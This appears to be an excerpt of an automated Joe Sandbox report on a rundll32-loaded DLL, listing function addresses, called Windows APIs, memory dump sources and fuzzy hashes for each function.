                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: GetLastError.KERNEL32 ref: 000000018004179F
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: FlsGetValue.KERNEL32 ref: 00000001800417B4
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: SetLastError.KERNEL32 ref: 000000018004183F
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,000000018005313B,?,00000000,00000092,?,?,00000000,?,00000001800450E9), ref: 00000001800529A2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3029459697-0
                                                                                                                                                                                                                            • Opcode ID: 7c6a1ab1348aadcda8b645532a55b2ef53cd212c09ea6c260039db7d4514d68c
                                                                                                                                                                                                                            • Instruction ID: c55b624f40470eeb55325c742f64684278a444bada1f44e2be2e5c1fcc7ccdcf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c6a1ab1348aadcda8b645532a55b2ef53cd212c09ea6c260039db7d4514d68c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90110F73A046488AEB968F26D0803E87BA0FB89BE0F548115E669533C0CA35C6D9C740
                                                                                                                                                                                                                            Function 00000001800529D4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: GetLastError.KERNEL32 ref: 000000018004179F
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: FlsGetValue.KERNEL32 ref: 00000001800417B4
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: SetLastError.KERNEL32 ref: 000000018004183F
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00000001800530F7,?,00000000,00000092,?,?,00000000,?,00000001800450E9), ref: 0000000180052A52
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3029459697-0
                                                                                                                                                                                                                            • Opcode ID: 6913e3c9396b8703e620efe3684779e6725ecfdd29d73698224bbd4949e38b70
                                                                                                                                                                                                                            • Instruction ID: 874b46cc1c6250f05ff8547d3204f5da427d166d22adba258d85a1447b95add9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6913e3c9396b8703e620efe3684779e6725ecfdd29d73698224bbd4949e38b70
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F01687270428887E7A24F15E4407E972A2EB597E4F45C321F634532C9CF3689C8C301
                                                                                                                                                                                                                            Function 0000000180047A78 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001800488EF,?,?,?,?,?,?,?,?,00000000,0000000180051E24), ref: 0000000180047AC7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            • Opcode ID: 7d5690268f61b4417f9e896208199cfdd4b1b0409d88cd35c5ce761aae87e559
                                                                                                                                                                                                                            • Instruction ID: b06e2ac7ae5086f53da68ca9e7b5d672dde735938ef0f8393ca816aaf5dcec71
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d5690268f61b4417f9e896208199cfdd4b1b0409d88cd35c5ce761aae87e559
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F08772300B4882E781CB69F8813DA23A6F78CBC0F45C025FA4987769DF3CC6688344
                                                                                                                                                                                                                            Function 0000000180047BBC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            • Opcode ID: 445c6ff4464aa4c3912272b39eb766391d3cf6a24e4ed2c4f0ef7716039556ee
                                                                                                                                                                                                                            • Instruction ID: 22a6557f102773bb54adb439e07be24dc57206114b946aab798d8ca15dcfd6b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 445c6ff4464aa4c3912272b39eb766391d3cf6a24e4ed2c4f0ef7716039556ee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E0E5B5300A0895FB86DB55EC923A933A5A39DBD0F81D025E90E8B728DF3DC2598301
                                                                                                                                                                                                                            Function 0000000180047C44 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            • Opcode ID: a9c983e92899d5a2bb33010fdddd129bf911e1e5a3f371a9e71455970331af45
                                                                                                                                                                                                                            • Instruction ID: ac9c4141f0fe5a7a06219587f5223e7b8a9c189638542b4ee5b59ba081799758
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9c983e92899d5a2bb33010fdddd129bf911e1e5a3f371a9e71455970331af45
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEE04631600A0491E2869B81FC523E923A5A3ED7C0F91C129F80A1B724AF3E835D8301
                                                                                                                                                                                                                            Function 0000000180041FEC Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                            • Opcode ID: e0af3328714dfbd475fed1d95b087d6b754e99d6b4a54bb4d0e410c33d531b1b
                                                                                                                                                                                                                            • Instruction ID: 83d94e2cae758789bb8f5701f60de5dc16525906839f6e668cd8204dc1268589
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0af3328714dfbd475fed1d95b087d6b754e99d6b4a54bb4d0e410c33d531b1b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FA14672704BC886EBA6CF25A4807DE77A1A7A8BC8F46C121EF4947795DE3DC609C701
                                                                                                                                                                                                                            Function 000000018002B620 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: 18c264033b5c03e0796cd7864972cf298c636ea2034c8301feece742694cbdfc
                                                                                                                                                                                                                            • Instruction ID: 801e3fbb0c6ca13713d9e3cb7a72ecea03f622a5a8e9d758b3f95b703ea660cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18c264033b5c03e0796cd7864972cf298c636ea2034c8301feece742694cbdfc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69B1C07210474886E7E78F29C0953AD3BA5E74DF88F18911AEF8987399CF35CA88C744
                                                                                                                                                                                                                            Function 000000018002BDDC Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: cb48baa701090f9aedec14d32df1611dc07203fb4bb2fac156f71034c2d87d75
                                                                                                                                                                                                                            • Instruction ID: 65ef7e8e34c5486b43a68c1f6fb74e965974eacd76392e7a2ba2568aa1eda785
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb48baa701090f9aedec14d32df1611dc07203fb4bb2fac156f71034c2d87d75
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07B1907220474885E7EB8F39C5907AD3BA0E34DB88F199115EF4A87396CF35C648C745
                                                                                                                                                                                                                            Function 0000000180048AB4 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                            • API String ID: 0-595813830
                                                                                                                                                                                                                            • Opcode ID: fe20d45e453fa96ebd0997a9ece8e60e50da2bb89f9b7d3c07397e282436abf1
                                                                                                                                                                                                                            • Instruction ID: 36e2eed64887deb43f59ca417a3340822668f6e529c4fe682e18941d56a36c6d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe20d45e453fa96ebd0997a9ece8e60e50da2bb89f9b7d3c07397e282436abf1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E04F71602E0CD5FA9B9B81AC507E51291E70CBD4F59D422AE141B3A5DE3C879EC305
                                                                                                                                                                                                                            Function 000000018004A5BC Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                            • Opcode ID: 85f156514259d3fad707b68f7e88d7a667a10afc930636faedffb861465dd2df
                                                                                                                                                                                                                            • Instruction ID: 1e887c444bd7a8ee2e01f2d4ca443994fee521a0987a316c7bf8239faa663ea3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f156514259d3fad707b68f7e88d7a667a10afc930636faedffb861465dd2df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03B09278A03A08C2EA8A6B61AC8234422A4BB8C740F958028E00D52320DE2D02A98701
                                                                                                                                                                                                                            Function 0000000180033088 Relevance: .4, Instructions: 368COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ac985125e387d8ee1785c7d07e681f8bea089554fdf55ad9e708ad4e88f36c15
                                                                                                                                                                                                                            • Instruction ID: bdb37eef7d95e79d8c3e55c89403c1b48d1ba01ab9340baba4eb2afcbdbc4a0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac985125e387d8ee1785c7d07e681f8bea089554fdf55ad9e708ad4e88f36c15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5E1A03620064986EBEB9F1980823EF77A1F748BD4F5AD129AE45473D5DF35CA8AC700
                                                                                                                                                                                                                            Function 000000018003356C Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e0867f32cf2cb0fec38759676e380358fb842343c7a0329e1ea83c396bef2129
                                                                                                                                                                                                                            • Instruction ID: 4d9f6cbbf1ca453dd679912f6abde7fb0fc90905a9d5ecc38bf79d85316923f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0867f32cf2cb0fec38759676e380358fb842343c7a0329e1ea83c396bef2129
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0E1C1B610064885EBEBDF1980823EB67A1F748BD8F56C11ABE854B3D4CF35CA4AC700
                                                                                                                                                                                                                            Function 0000000180032BB8 Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7bed7e0a5f606dd84b740b6f64ded2854c8d0b288178c504b20d46654782f5cf
                                                                                                                                                                                                                            • Instruction ID: cba9864bf0ad8f1e5209cdd505b7639152df81affa52c26f52febd7f8e7aec23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bed7e0a5f606dd84b740b6f64ded2854c8d0b288178c504b20d46654782f5cf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57E1CD3620024986EBEBDE1980513EF27A1F74CBC8F5AD226BE45473D5CE35CA8AD740
                                                                                                                                                                                                                            Function 0000000180044F38 Relevance: .4, Instructions: 357COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
